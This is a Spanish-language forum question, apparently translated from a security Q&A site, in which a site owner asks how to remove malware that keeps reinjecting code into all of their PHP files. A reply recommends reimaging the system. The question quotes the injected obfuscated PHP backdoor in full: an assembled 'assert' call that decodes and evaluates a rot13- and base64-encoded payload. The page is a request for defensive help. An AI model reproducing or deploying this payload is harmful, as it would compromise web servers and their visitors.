PHP mallware attack [duplicado]

0

Estoy desactualizado porque mi sitio ha sido atacado por un malware que agrega el código a continuación en todos los archivos php. Intenté editar y chmod el archivo infectado pero está volviendo. El escaneo con ClamAV no encontró nada. ¿Alguna idea de cómo limpiarlo?

<?php
//###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
if (!@$m1cd6) {$m1cd6=1;@$strings(str_rot13('riny(onfr64_qrpbqr("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"));'));}
//###==###
    
pregunta Mohammad Irfan 24.09.2015 - 19:52
fuente

1 respuesta

1

Si tiene Malware que está atacando archivos de nivel de sistema, debe Reconstruir o Re-Image ese sistema por completo. En este caso, es posible que un simple Malware o Anti-Virus Scan no lo detecte, especialmente si el proceso en el que se está ejecutando es común o no es reconocido por su A / V o el Software de Escaneo.

Use un enfoque de arriba hacia abajo para escanear cada parte de su red / sistema, pero comience por crear una nueva imagen del sistema sospechoso.

    
respondido por el systech 24.09.2015 - 20:15
fuente

Lea otras preguntas en las etiquetas